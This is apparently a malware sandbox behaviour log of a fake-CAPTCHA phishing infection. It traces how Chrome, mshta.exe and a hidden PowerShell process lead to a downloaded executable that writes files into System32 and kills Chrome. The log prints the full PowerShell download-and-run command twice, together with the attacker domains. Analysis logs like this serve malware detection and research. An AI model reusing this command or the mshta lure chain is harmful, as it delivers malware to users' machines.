      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.139.99:443 -> 192.168.2.16:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.46.36:443 -> 192.168.2.16:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.46.36:443 -> 192.168.2.16:49774 version: TLS 1.2

      System Summary

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\downloaded.exeJump to dropped file
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeFile created: C:\Windows\System32\downloaded_ext.zip
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeFile created: C:\Windows\System32\messages_log.txt
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: classification engineClassification label: mal84.phis.win@35/12@23/179
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1388:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwsvl2i0.fs2.ps1
      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1920,i,12704983008749592542,2319869984269630859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.order129837129821.one"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1920,i,12704983008749592542,2319869984269630859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://account.order129837129821.one/captcha # ? ''I am not a robot - reCAPTCHA Verification ID: 3781''
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\downloaded.exe "C:\Users\user\AppData\Local\Temp\downloaded.exe"
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeProcess created: C:\Users\user\AppData\Local\Temp\downloaded.exe "C:\Users\user\AppData\Local\Temp\downloaded.exe"
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\downloaded.exe "C:\Users\user\AppData\Local\Temp\downloaded.exe"
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: edputil.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: appresolver.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: bcp47langs.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: slc.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: sppc.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: pcacli.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: sfc_os.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: secur32.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: dnsapi.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: rasadhlp.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: fwpuclnt.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: schannel.dll
